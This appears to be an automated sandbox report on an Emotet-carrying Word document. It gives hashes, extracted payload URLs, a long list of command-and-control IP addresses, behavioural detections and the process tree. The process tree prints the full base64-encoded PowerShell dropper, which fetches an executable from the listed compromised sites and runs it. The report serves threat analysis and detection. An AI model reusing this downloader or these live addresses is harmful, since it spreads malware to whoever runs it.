Analysis
-
max time kernel
135s -
max time network
131s -
platform
windows10_x64 -
resource
win10 -
submitted
31-07-2020 19:48
Static task
static1
Behavioral task
behavioral1
Sample
emotet_e1_d99a1916b1d097d5768cd11a74be70e02974b1de04cd2e5e8585b1a7837cf68a_2020-07-31__194800._doc.doc
Resource
win7v200722
General
-
Target
emotet_e1_d99a1916b1d097d5768cd11a74be70e02974b1de04cd2e5e8585b1a7837cf68a_2020-07-31__194800._doc.doc
-
Size
169KB
-
MD5
e8a6a9ae4f872aa76127a5c0cf615c51
-
SHA1
637756394c724655f8a9be26db62986f65f65db3
-
SHA256
d99a1916b1d097d5768cd11a74be70e02974b1de04cd2e5e8585b1a7837cf68a
-
SHA512
ee1069ee51962f896b5824a86fc346ceca7aaa472759b397f0f4f4eaa8dd899c50938177753c08b07ced85cabd7812ad47b32f9781571244db6328f7f7ee5bdd
Malware Config
Extracted
http://artexproductions.com/cgi-bin/xHdbmk/
http://whistledownfarm.com/cgi-bin/tlsjw81/
http://e-motiva.com/wp-admin/bFr531220/
http://stolkie.net/m/H0LV59574/
http://www.faccomputer.com/images/5mMAg7bKKK/
Extracted
emotet
73.116.193.136:80
185.94.252.13:443
149.62.173.247:8080
89.32.150.160:8080
185.94.252.12:80
77.90.136.129:8080
83.169.21.32:7080
104.236.161.64:8080
114.109.179.60:80
189.2.177.210:443
68.183.190.199:8080
144.139.91.187:443
185.94.252.27:443
190.181.235.46:80
82.196.15.205:8080
46.28.111.142:7080
181.167.96.215:80
202.62.39.111:80
219.92.13.25:80
191.99.160.58:80
50.28.51.143:8080
172.104.169.32:8080
192.241.146.84:8080
82.240.207.95:443
80.249.176.206:80
2.47.112.152:80
212.231.60.98:80
77.55.211.77:8080
170.81.48.2:80
5.196.35.138:7080
143.0.87.101:80
190.6.193.152:8080
217.199.160.224:7080
187.162.248.237:80
93.151.186.85:80
177.74.228.34:80
204.225.249.100:7080
217.13.106.14:8080
51.255.165.160:8080
104.131.103.37:8080
177.72.13.80:80
190.163.31.26:80
186.70.127.199:8090
61.92.159.208:8080
12.162.84.2:8080
71.50.31.38:80
186.250.52.226:8080
92.23.34.86:80
177.144.135.2:80
201.213.156.176:80
190.147.137.153:443
94.176.234.118:443
181.129.96.162:8080
178.79.163.131:8080
111.67.12.221:8080
177.66.190.130:80
191.182.6.118:80
68.183.170.114:8080
177.73.0.98:443
203.25.159.3:8080
45.161.242.102:80
181.120.79.227:80
72.47.248.48:7080
177.139.131.143:443
189.194.58.119:80
137.74.106.111:7080
189.1.185.98:8080
190.194.242.254:443
190.17.195.202:80
192.241.143.52:8080
87.106.46.107:8080
212.71.237.140:8080
179.60.229.168:443
70.32.84.74:8080
70.32.115.157:8080
104.131.41.185:8080
Signatures
-
Suspicious behavior: EnumeratesProcesses 9 IoCs
pid Process 3104 powersheLL.exe 3104 powersheLL.exe 3104 powersheLL.exe 1216 d3dxof.exe 1216 d3dxof.exe 1216 d3dxof.exe 1216 d3dxof.exe 1216 d3dxof.exe 1216 d3dxof.exe -
Blacklisted process makes network request 3 IoCs
flow pid Process 7 3104 powersheLL.exe 9 3104 powersheLL.exe 28 3104 powersheLL.exe -
Executes dropped EXE 2 IoCs
pid Process 3752 273.exe 1216 d3dxof.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 3752 wrote to memory of 1216 3752 273.exe 78 PID 3752 wrote to memory of 1216 3752 273.exe 78 PID 3752 wrote to memory of 1216 3752 273.exe 78 -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3104 1880 powersheLL.exe 68 -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
pid Process 3820 WINWORD.EXE 3820 WINWORD.EXE -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3104 powersheLL.exe -
Emotet Payload 4 IoCs
Detects Emotet payload in memory.
resource yara_rule behavioral2/memory/3752-8-0x0000000000510000-0x000000000051C000-memory.dmp emotet behavioral2/memory/3752-8-0x0000000000510000-0x000000000051C000-memory.dmp emotet behavioral2/memory/1216-11-0x00000000001F0000-0x00000000001FC000-memory.dmp emotet behavioral2/memory/1216-11-0x00000000001F0000-0x00000000001FC000-memory.dmp emotet -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\PresentationHostProxy\d3dxof.exe 273.exe -
Suspicious use of SetWindowsHookEx 11 IoCs
pid Process 3820 WINWORD.EXE 3820 WINWORD.EXE 3820 WINWORD.EXE 3820 WINWORD.EXE 3820 WINWORD.EXE 3820 WINWORD.EXE 3820 WINWORD.EXE 3820 WINWORD.EXE 3820 WINWORD.EXE 3752 273.exe 1216 d3dxof.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\emotet_e1_d99a1916b1d097d5768cd11a74be70e02974b1de04cd2e5e8585b1a7837cf68a_2020-07-31__194800._doc.doc" /o ""1⤵
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
PID:3820
-
C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exepowersheLL -e JABSAEoARgBDAE4AYgBrAHIAPQAnAFYAQwBXAFYAWgBtAHAAaQAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAGUAQwBVAHIAaQBgAFQAWQBQAGAAUgBPAHQAbwBDAE8AbAAiACAAPQAgACcAdABsAHMAMQAyACwAIAB0AGwAcwAxADEALAAgAHQAbABzACcAOwAkAFcARwBGAE0AUQByAHkAcQAgAD0AIAAnADIANwAzACcAOwAkAE0AQQBBAEkARQB6AHUAaAA9ACcASQBVAFgAWgBDAHAAbgB1ACcAOwAkAEQAWQBPAEUAQQBoAGMAcwA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAVwBHAEYATQBRAHIAeQBxACsAJwAuAGUAeABlACcAOwAkAEIATABNAFQASQBjAGgAcAA9ACcAQgBHAFMAWABIAGsAYwBlACcAOwAkAEEAUQBXAEUAUQB4AG0AZgA9ACYAKAAnAG4AZQB3AC0AbwAnACsAJwBiAGoAZQAnACsAJwBjAHQAJwApACAAbgBlAHQALgB3AGUAQgBjAEwAaQBlAE4AdAA7ACQAUQBBAEkATABXAGcAcQBuAD0AJwBoAHQAdABwADoALwAvAGEAcgB0AGUAeABwAHIAbwBkAHUAYwB0AGkAbwBuAHMALgBjAG8AbQAvAGMAZwBpAC0AYgBpAG4ALwB4AEgAZABiAG0AawAvACoAaAB0AHQAcAA6AC8ALwB3AGgAaQBzAHQAbABlAGQAbwB3AG4AZgBhAHIAbQAuAGMAbwBtAC8AYwBnAGkALQBiAGkAbgAvAHQAbABzAGoAdwA4ADEALwAqAGgAdAB0AHAAOgAvAC8AZQAtAG0AbwB0AGkAdgBhAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBiAEYAcgA1ADMAMQAyADIAMAAvACoAaAB0AHQAcAA6AC8ALwBzAHQAbwBsAGsAaQBlAC4AbgBlAHQALwBtAC8ASAAwAEwAVgA1ADkANQA3ADQALwAqAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBmAGEAYwBjAG8AbQBwAHUAdABlAHIALgBjAG8AbQAvAGkAbQBhAGcAZQBzAC8ANQBtAE0AQQBnADcAYgBLAEsASwAvACcALgAiAFMAUABsAGAAaQB0ACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQAUQBBAEIAQwBTAHUAcwBpAD0AJwBZAEQAVABGAE0AcwBtAGgAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFYASwBPAFgAVABiAGUAZAAgAGkAbgAgACQAUQBBAEkATABXAGcAcQBuACkAewB0AHIAeQB7ACQAQQBRAFcARQBRAHgAbQBmAC4AIgBkAGAAbwB3AE4AbABPAEEAZABGAGAAaQBgAGwARQAiACgAJABWAEsATwBYAFQAYgBlAGQALAAgACQARABZAE8ARQBBAGgAYwBzACkAOwAkAEkAUwBSAFkAQgBvAHAAdAA9ACcAWgBMAE0ATQBXAHkAZAB3ACcAOwBJAGYAIAAoACgAJgAoACcARwBlAHQAJwArACcALQBJACcAKwAnAHQAZQBtACcAKQAgACQARABZAE8ARQBBAGgAYwBzACkALgAiAGwAZQBgAE4AZwBUAGgAIgAgAC0AZwBlACAAMwA1ADQAMgAxACkAIAB7ACgAWwB3AG0AaQBjAGwAYQBzAHMAXQAnAHcAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMAJwApAC4AIgBjAGAAUgBlAGEAVABFACIAKAAkAEQAWQBPAEUAQQBoAGMAcwApADsAJABZAFMAUwBCAEEAcQBqAG0APQAnAFYAVABBAEwAWgBvAHUAbAAnADsAYgByAGUAYQBrADsAJABTAFkATgBOAFoAdABzAHgAPQAnAEwARwBVAEIAUQB5AGwAagAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABRAFEAUQBIAFMAYgB5AHgAPQAnAFkAWgBOAFkAQwBuAGoAZAAnAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
- Process spawned unexpected child process
- Suspicious use of AdjustPrivilegeToken
PID:3104
-
C:\Users\Admin\273.exeC:\Users\Admin\273.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
PID:3752 -
C:\Windows\SysWOW64\PresentationHostProxy\d3dxof.exe"C:\Windows\SysWOW64\PresentationHostProxy\d3dxof.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1216
-